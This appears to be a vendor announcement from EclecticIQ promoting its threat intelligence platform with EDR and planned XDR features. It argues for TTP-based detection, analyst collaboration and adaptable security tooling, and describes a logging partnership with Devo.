Despite success in managing and sharing threat intelligence for greater understanding, as an industry we have not yet solved the challenge of operationalizing this intelligence.
There are many reasons for this:
- Cyberthreats change rapidly
- The attack surface has expanded exponentially due to digitalization and cloud adoption
- Threat intelligence is often viewed as an add-on to security tools and practices
- Organizations face cyberthreats in isolation
- Existing tools do not allow analyst teams to scale up their activities and optimize their efficiency in detecting and responding to threat
To help organizations apply threat intelligence in their operations to defeat attackers and strengthen their overall security posture, EclecticIQ is launching a new platform that puts “Intelligence at the core™” of cyber defense. EclecticIQ Platform is designed to help customers run their cyberthreat intelligence and security operations more efficiently. This new platform builds on our pioneering, analyst-centric threat intelligence platform (TIP) that enables national governments, enterprises, and service providers to manage and collaborate on threat intelligence. It includes endpoint detection and response (EDR) capabilities and, later this year, will add extended detection and response (XDR) technology.
How to Operationalize Threat Intelligence
Go beyond IOCs/IOAs
Detecting cyberthreats requires more than just static indicators of compromise (IOCs) and indicators of attack (IOAs), which point to an adversary’s infrastructure or previously observed malware. We see that rapidly changing threats are diminishing the value of IOCs and IOAs. Instead, threat intelligence solutions need to embrace dynamic, behavior-based detection that relies on attackers’ tools, techniques, and procedures (TTPs). This means that behavior-based frameworks like MITRE ATT&CK, and threat detection and hunting content like EDR/SIEM rules and SIGMA, need to become primary resources for acquiring, collaborating on, and applying threat intelligence.
In other words, staying ahead of the rapidly changing threat landscape requires an approach beyond the IOC. For instance, the new EDR solution included in EclecticIQ platform is pre-bundled with hunting packs based on TTPs.
Analyst time and attention is scarce. In pursuit of the perfect alert, our industry has become accustomed to down-selecting intelligence, alerts, and incidents based on the confidence that they indicate an active threat. In doing so, we’ve created an artificial threshold below which we’ve become blind.
Unfortunately, our confidence in the ability to detect notable and impactful threats isn’t always perfect – yet if we wait for perfect, we’ll always be too late. This challenge requires several solutions. First, analysts need the right tools to scale up their efforts, including powerful visualization, search, and enrichment & workflow automation solutions, and to provide an all-encompassing view of the larger threat and risk landscape. Second, analysts should not operate in silos, facing the same threats in isolation. They should be able to obtain expert knowledge from peers and industry leaders and plug it into their tools. Collaboration on cyberthreats and incidents should be a given. Finally, they need ways of dealing with high volumes of low-confidence indications of threat, rather than ignoring them.
In other words, scalable analyst teams require the right tools, access to outside expertise, and a collaborative approach. EclecticIQ Platform allows analysts to collaborate internally and externally. Our new EDR solution comes with powerful search and visualization capabilities, while our upcoming XDR solution will take a new approach to hunting for large volumes of low-confidence data.
To effectively operationalize threat intelligence, organizations must adapt their cybersecurity defense at the same fast pace as the evolution of the threat landscape. At EclecticIQ, we’ve learned that a bolt-on approach to integrating threat intelligence limits the effectiveness of cyberthreat detection. For example, detecting an emerging threat that uses a novel technique calls for new means of collecting data on endpoints or cloud workloads. By designing detection systems with a foundation of threat intelligence, it’s possible to seamlessly adapt to emerging threats by temporarily expanding the types of data that are collected. Orchestrating intelligence to enhance the capabilities of security controls is only part of the solution. Ensuring your security stack can adapt its own mode of operation and configuration to match the changing threat landscape is key in staying ahead.
In other words, staying on track with emerging threats requires intelligence at the core of cyber defense. Our new EDR and XDR solutions are highly adaptable: they can be configured to collect the right data to cope with new and fast-changing threats.
Digitalization and cloud adoption are expanding the attack surface and the number of events to monitor, compounding the problem of ineffective use of threat intelligence to detect, hunt for, and effectively respond to cyberthreats. This large attack surface, combined with a myriad of tools including SOAR, EDR, and SIEM, is complicating security architectures to the point of becoming unmanageable. EclecticIQ aims to simplify management of and compatibility between critical security stack components with our integrated platform for threat intelligence, hunting, and response and our partnership with Devo for:
- High-performance, cloud-native logging
- Data ingestion from a variety of endpoint, network, and cyberthreat intelligence sources
- Automated IOC enrichment and machine learning-powered analytic capabilities
EclecticIQ Platform is unique in using threat intelligence as its foundation. This open and extensible platform makes it easy to use and share intelligence from multiple sources to detect threats earlier, remediate incidents faster, and run operations more efficiently.
If you believe what we believe about the critical importance of operationalizing – not just understanding – threat intelligence, join us on this journey to put intelligence at the core of your cyber defense operations.
I would love to hear from you. Contact me at firstname.lastname@example.org.